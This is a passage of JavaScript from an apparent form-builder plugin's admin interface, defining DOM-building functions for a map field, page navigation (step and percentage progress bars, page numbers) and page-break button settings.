	edit_main_td7.appendChild(Longitude);
	edit_main_td7.appendChild(br8);
	edit_main_td7.appendChild(Latitude);
	edit_main_td7_1.appendChild(el_map_address);
	edit_main_td7_1.appendChild(br7);

	edit_main_td7_1.appendChild(el_map_longitude);
	edit_main_td7_1.appendChild(br2);
	edit_main_td7_1.appendChild(el_map_latitude);
	
	edit_main_td2.appendChild(br3);

	edit_main_td3.appendChild(el_label_map_size);
	edit_main_td3_1.appendChild(Width);
	edit_main_td3_1.appendChild(el_map_width);
	edit_main_td3_1.appendChild(br5);
	edit_main_td3_1.appendChild(Height);
	edit_main_td3_1.appendChild(el_map_height);

	edit_main_td4.appendChild(el_info_label);
	edit_main_td4_1.appendChild(el_info_textarea);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br6);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	

	
	
/*	edit_main_td5.appendChild(el_guidelines_label);
	edit_main_td5.appendChild(br4);
	edit_main_td5.appendChild(el_guidelines_textarea);
*/	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);


	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='div';
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_mark_map");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	
	var adding = document.createElement('div');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("long0", w_long);
		adding.setAttribute("lat0", w_lat);
		adding.setAttribute("zoom", w_zoom);
		adding.style.cssText = "width:"+w_width+"px; height: "+w_height+"px";
 		adding.setAttribute("info0", w_info);
 		adding.setAttribute("center_x", w_center_x);
		adding.setAttribute("center_y", w_center_y);
		
     
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
		
		
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
		
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding);

      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
if_gmap_init(i);
add_marker_on_map(i, 0, w_long, w_lat, w_info, true);

}

//////////////////////////////////////////////
///////////  type_page_break   //////////////////
///////////////////////////////////////////////
	
function type_page_navigation(w_type, w_show_title, w_show_numbers, w_attr_name, w_attr_value)
{
  if (need_enable) {
    enable2();
  }
	document.getElementById("element_type").value="type_page_navigation";
	delete_last_child();
  // edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border:0px;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
	edit_main_td6.setAttribute("colspan", "2");
		  
		  
	var el_pagination_opt_label = document.createElement('label');
			el_pagination_opt_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_pagination_opt_label.innerHTML = "Pagination Options";
		
	var el_pagination_steps = document.createElement('input');
			el_pagination_steps.setAttribute("id", "el_pagination_steps");
			el_pagination_steps.setAttribute("type", "radio");
			el_pagination_steps.setAttribute("name", "el_pagination");
			el_pagination_steps.setAttribute("value", "steps");
			el_pagination_steps.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_steps.setAttribute("onclick", "pagination_type('steps')");
		Steps = document.createTextNode("Steps");
			
	var el_pagination_percentage = document.createElement('input');
			el_pagination_percentage.setAttribute("id", "el_pagination_percentage");
			el_pagination_percentage.setAttribute("type", "radio");
			el_pagination_percentage.setAttribute("name", "el_pagination");
			el_pagination_percentage.setAttribute("value", "percentage");
			el_pagination_percentage.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_percentage.setAttribute("onclick", "pagination_type('percentage')");
		Percentage = document.createTextNode("Percentage");
		
	var el_pagination_none = document.createElement('input');
			el_pagination_none.setAttribute("id", "el_pagination_none");
			el_pagination_none.setAttribute("type", "radio");
			el_pagination_none.setAttribute("name", "el_pagination");
			el_pagination_none.setAttribute("value", "none");
			el_pagination_none.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_none.setAttribute("onclick", "pagination_type('none')");
		 No_Context = document.createTextNode(" No Context");
		
	if(w_type=='steps')
		el_pagination_steps.setAttribute("checked","checked");
	else
		if(w_type=='percentage')
			el_pagination_percentage.setAttribute("checked","checked");
		else
			el_pagination_none.setAttribute("checked","checked");
				
	var el_show_title_label = document.createElement('label');
			el_show_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_show_title_label.innerHTML = "Show Page Titles in Progress Bar";
		
	var el_show_title_input = document.createElement('input');
			el_show_title_input.setAttribute("id", "el_show_title_input");
			el_show_title_input.setAttribute("type", "checkbox");
			el_show_title_input.setAttribute("onClick", "show_title_pagebreak();");
			
	if(w_show_title)
		el_show_title_input.setAttribute("checked","checked");
		
	var el_show_numbers_label = document.createElement('label');
			el_show_numbers_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_show_numbers_label.innerHTML = "Show Page Numbers in Footer";
		
	var el_show_numbers_input = document.createElement('input');
			el_show_numbers_input.setAttribute("id", "el_show_numbers_input");
			el_show_numbers_input.setAttribute("type", "checkbox");
			el_show_numbers_input.setAttribute("onClick", "show_numbers_pagebreak();");
			
	if(w_show_numbers)
		el_show_numbers_input.setAttribute("checked","checked");
		
	var el_pagination_class_label = document.createElement('label');
	        el_pagination_class_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_pagination_class_label.innerHTML = "Pagination Class name";
	
	var el_pagination_class_input = document.createElement('input');
            el_pagination_class_input.setAttribute("id", "next_element_style");
			el_pagination_class_input.setAttribute("type", "text");
			el_pagination_class_input.setAttribute("value", "");
            el_pagination_class_input.style.cssText = "width:100px; margin-left:20px";
            el_pagination_class_input.setAttribute("onChange", "change_pagebreak_class(this.value, 'next')");		
		


	var el_page_titles_label = document.createElement('label');
	        el_page_titles_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_page_titles_label.innerHTML = "Pages Title";
			
	edit_main_td6.appendChild(el_page_titles_label);
	w_pages=[];	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{
		if(document.getElementById('form_id_tempform_view'+j))
		{
			k++;
			var br_temp = document.createElement('br');
			var el_page_title_input= document.createElement('input');
			el_page_title_input.setAttribute("type", "text");
			el_page_title_input.style.cssText = "width:100px";
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title')==null)
				el_page_title_input.setAttribute("value", "Untitled Page");
			else
				el_page_title_input.setAttribute("value", document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'));
			
			el_page_title_input.setAttribute("id", "page_title_"+j);
			el_page_title_input.setAttribute("onKeyUp", "set_page_title(this.value,'"+j+"')");
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages[j]=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages[j]="Untitled Page"
				
			page_num=document.createTextNode(k+'. ');
			
			edit_main_td6.appendChild(br_temp);
			edit_main_td6.appendChild(page_num);
			edit_main_td6.appendChild(el_page_title_input);

		}
	
	}	




		
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr( 'type_checkbox')");

	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_pagination_opt_label);
	edit_main_td1.appendChild(br4);
	edit_main_td1.appendChild(el_pagination_steps);
	edit_main_td1.appendChild(Steps);
	edit_main_td1.appendChild(br6);
	edit_main_td1.appendChild(el_pagination_percentage);
	edit_main_td1.appendChild(Percentage);
	edit_main_td1.appendChild(br5);
	edit_main_td1.appendChild(el_pagination_none);
	edit_main_td1.appendChild(No_Context);
	edit_main_td1.setAttribute("colspan", "2");
	
	edit_main_td3.appendChild(el_show_title_label);
	edit_main_td3_1.appendChild(el_show_title_input);
	
	edit_main_td4.appendChild(el_show_numbers_label);
	edit_main_td4_1.appendChild(el_show_numbers_input);
/*	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br3);
	edit_main_td2.appendChild(el_attr_table);*/
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr6.appendChild(edit_main_td6);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr6);
//	edit_main_table.appendChild(edit_main_tr2);

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", "_elemet_tableform_id_temp");
		table.setAttribute("width", "90%");
	
    var tr = document.createElement('tr');
	
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", "_element_sectionform_id_temp");
			td2.setAttribute("width", "100%");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
			
		var pages_div = document.createElement('div');
				pages_div.setAttribute("align","left");
				pages_div.setAttribute("id","pages_div");
				pages_div.style.width='100%';
				pages_div.innerHTML="";
		
		
		var numbers_div = document.createElement('div');
				numbers_div.setAttribute("align","center");
				numbers_div.setAttribute("id","numbers_div");
				numbers_div.style.width='100%';
				numbers_div.style.paddingTop='100px';
				numbers_div.innerHTML="";
		
		
				
		td2.appendChild(pages_div);
		td2.appendChild(numbers_div);
      	var main_td  = document.getElementById('show_table');
	
      
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
		
	if(w_type=='steps')
		make_page_steps(w_pages);
	else
		if(w_type=='percentage')
			make_page_percentage(w_pages);
		else
			make_page_none(w_pages);
			
	if(w_show_numbers)
		show_numbers_pagebreak();
		


//refresh_attr(i, 'type_checkbox');
}

function set_page_title(title, id) {
  title = title.replace(/(<([^>]+)>)/ig, "");
	document.getElementById("form_id_tempform_view"+id).setAttribute('page_title',title);
	show_title_pagebreak();
}

function show_numbers_pagebreak()
{
	document.getElementById("numbers_div").innerHTML="";
	if(document.getElementById("el_show_numbers_input").checked)
	{
		k=0;
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('form_id_tempform_view'+j))
			{
				k++;		
				if(j==form_view)
					page_number=k;
			}
		}
		
		var cur = document.createElement('span');
			cur.setAttribute("class", "page_numbersform_id_temp");
			cur.innerHTML=page_number+'/'+k;
			
		document.getElementById("numbers_div").appendChild(cur);
	}
}

function refresh_page_numbers()
{
	k=0;
	if(document.getElementById('pages').getAttribute('show_numbers')=='true')
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('page_numbersform_id_temp'+j))
			{
				k++;		
			}
		}
		
	cur_num=0;
	
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('page_numbersform_id_temp'+j))
			{
				cur_num++;		
		
				document.getElementById("page_numbersform_id_temp"+j).innerHTML='';
				
				if(document.getElementById('pages').getAttribute('show_numbers')=='true')
				{
					var cur = document.createElement('span');
						cur.setAttribute("class", "page_numbersform_id_temp");
						cur.innerHTML=cur_num+'/'+k;
						
					document.getElementById("page_numbersform_id_temp"+j).appendChild(cur);
				}
			}
		}

}

function pagination_type(type)
{
	document.getElementById("pages_div").innerHTML="";
	w_pages=[];	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{
		if(document.getElementById('form_id_tempform_view'+j))
		{
			k++;
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages[j]=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages[j]="none";
		}
		
	}	


	if(type=='steps')
		make_page_steps(w_pages);
	else
		if(type=='percentage')
			make_page_percentage(w_pages);
		else
			make_page_none();
			

}

function show_title_pagebreak()
{
	document.getElementById("pages_div").innerHTML="";

if(document.getElementById("el_pagination_steps").checked)
	pagination_type('steps');
else
	if(document.getElementById("el_pagination_percentage").checked)
		pagination_type('percentage');
}
function make_page_steps(w_pages)
{
	document.getElementById("pages_div").innerHTML="";
	show_title=document.getElementById('el_show_title_input').checked;
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(w_pages[j])
			{
			k++;
			if(w_pages[j]=="none")	
				w_pages[j]='';	
			page_number = document.createElement('span');
			
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages[j];
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById("pages_div").appendChild(page_number);
		}
	}
	
}

function make_page_percentage(w_pages)
{
	document.getElementById("pages_div").innerHTML="";
	show_title=document.getElementById('el_show_title_input').checked;
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
		
	var b = document.createElement('b');
       	b.style.margin='3px 7px 3px 3px';
		//b.style.vertical-align='middle';
	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(w_pages[j])
			{
			k++;
				
			if(w_pages[j]=="none")	
				w_pages[j]='';	
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
					if(k==1)
						cur_page_title.style.paddingLeft="30px";
					else
						cur_page_title.style.paddingLeft="5px";
						cur_page_title.innerHTML=w_pages[j];
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById("pages_div").appendChild(div_parent);

	
}
function make_page_none()
{
	document.getElementById("pages_div").innerHTML="";
}


function type_page_break(i,w_page_title, w_title , w_type , w_class, w_check, w_attr_name, w_attr_value){
	
	
	
	var pos=document.getElementsByName("el_pos");
		pos[0].setAttribute("disabled", "disabled");
		pos[1].setAttribute("disabled", "disabled");
		pos[2].setAttribute("disabled", "disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.setAttribute("disabled", "disabled");

	
	document.getElementById("element_type").value="type_page_break";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border:0px;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
		  
	var el_page_title_label = document.createElement('label');
			el_page_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_page_title_label.innerHTML = "Page Title";
		
	var el_page_title_input = document.createElement('input');
			el_page_title_input.setAttribute("id", "el_page_title_input");
			el_page_title_input.setAttribute("type", "text");
			el_page_title_input.setAttribute("name", "el_page_title_input");
			el_page_title_input.setAttribute("value", w_page_title);
			el_page_title_input.style.cssText =   "padding:0; border-width: 1px";
            el_page_title_input.setAttribute("onKeyup", "pagebreak_title_change(this.value,'"+i+"')");
		  
		  
		  
		  
		  
		  
		  
	var el_type_next_label = document.createElement('label');
			el_type_next_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_type_next_label.innerHTML = "Next Type";
		
	var el_type_next_button = document.createElement('input');
			el_type_next_button.setAttribute("id", "el_type_next_button");
			el_type_next_button.setAttribute("type", "radio");
			el_type_next_button.setAttribute("name", "el_type_next");
			el_type_next_button.setAttribute("value", "button");
			el_type_next_button.style.cssText =   "padding:0; border-width: 1px";
            el_type_next_button.setAttribute("onclick", "pagebreak_type_change('next','button')");
		Button_next = document.createTextNode("Button");
			
	var el_type_next_text = document.createElement('input');
			el_type_next_text.setAttribute("id", "el_type_next_text");
			el_type_next_text.setAttribute("type", "radio");
			el_type_next_text.setAttribute("name", "el_type_next");
			el_type_next_text.setAttribute("value", "text");
			el_type_next_text.style.cssText =   " padding:0; border-width: 1px";
            el_type_next_text.setAttribute("onclick", "pagebreak_type_change('next','text')");
		Text_next = document.createTextNode("Text");
		
	var el_type_next_img = document.createElement('input');
			el_type_next_img.setAttribute("id", "el_type_next_img");
			el_type_next_img.setAttribute("type", "radio");
			el_type_next_img.setAttribute("name", "el_type_next");
			el_type_next_img.setAttribute("value", "img");
			el_type_next_img.style.cssText =   "padding:0; border-width: 1px";
            el_type_next_img.setAttribute("onclick", "pagebreak_type_change('next','img')");
		Image_next = document.createTextNode("Image");
		
	if(w_type[0]=='button')
		el_type_next_button.setAttribute("checked","checked");
	else
		if(w_type[0]=='text')
			el_type_next_text.setAttribute("checked","checked");
		else
			el_type_next_img.setAttribute("checked","checked");
				
	var el_title_next_label = document.createElement('label');
			el_title_next_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_title_next_label.setAttribute("id", "next_label");
			el_title_next_label.innerHTML = "Next name";
		
	var el_title_next = document.createElement('input');
			el_title_next.setAttribute("id", "el_title_next");
			el_title_next.setAttribute("type", "text");
			el_title_next.setAttribute("value", w_title[0]);
			el_title_next.style.cssText =   "width:150px;   padding:0; border-width: 1px";
			el_title_next.setAttribute("onKeyUp", "change_pagebreak_label( this.value, 'next');");
			el_title_next.setAttribute("onChange", "change_pagebreak_label( this.value, 'next');");
			
	var el_style_next_label = document.createElement('label');
	        el_style_next_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_next_label.innerHTML = "Next Class name";
	
	var el_style_next_textarea = document.createElement('input');
            el_style_next_textarea.setAttribute("id", "next_element_style");
			el_style_next_textarea.setAttribute("type", "text");
			el_style_next_textarea.setAttribute("value", w_class[0]);
            el_style_next_textarea.style.cssText = "width:100px; ";
            el_style_next_textarea.setAttribute("onChange", "change_pagebreak_class(this.value, 'next')");

	var el_check_next_label = document.createElement('label');
			el_check_next_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_check_next_label.innerHTML = "Check the required fields";
		
	var el_check_next_input = document.createElement('input');
			el_check_next_input.setAttribute("id", "el_check_next_input");
			el_check_next_input.setAttribute("type", "checkbox");
			el_check_next_input.setAttribute("onClick", "set_checkable('next');");
			
	if(w_check[0]=="true")
		el_check_next_input.setAttribute("checked","checked");
		

			
			
			
			
			
				
	var el_type_previous_label = document.createElement('label');
			el_type_previous_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_type_previous_label.innerHTML = "Previous Type";
		
	var el_type_previous_button = document.createElement('input');
			el_type_previous_button.setAttribute("id", "el_type_previous_button");
			el_type_previous_button.setAttribute("type", "radio");
			el_type_previous_button.setAttribute("name", "el_type_previous");
			el_type_previous_button.setAttribute("value", "button");
			el_type_previous_button.style.cssText =   " padding:0; border-width: 1px";
            el_type_previous_button.setAttribute("onclick", "pagebreak_type_change('previous','button')");
		Button_previous = document.createTextNode("Button");
			
	var el_type_previous_text = document.createElement('input');
			el_type_previous_text.setAttribute("id", "el_type_previous_text");
			el_type_previous_text.setAttribute("type", "radio");
			el_type_previous_text.setAttribute("name", "el_type_previous");
			el_type_previous_text.setAttribute("value", "text");
			el_type_previous_text.style.cssText =   " padding:0; border-width: 1px";
            el_type_previous_text.setAttribute("onclick", "pagebreak_type_change('previous','text')");
		Text_previous = document.createTextNode("Text");
		
	var el_type_previous_img = document.createElement('input');
			el_type_previous_img.setAttribute("id", "el_type_previous_img");
			el_type_previous_img.setAttribute("type", "radio");
			el_type_previous_img.setAttribute("name", "el_type_previous");
			el_type_previous_img.setAttribute("value", "img");
			el_type_previous_img.style.cssText =   "  padding:0; border-width: 1px";
            el_type_previous_img.setAttribute("onclick", "pagebreak_type_change('previous','img')");
		Image_previous = document.createTextNode("Image");
		
	if(w_type[1]=='button')
		el_type_previous_button.setAttribute("checked","checked");
	else
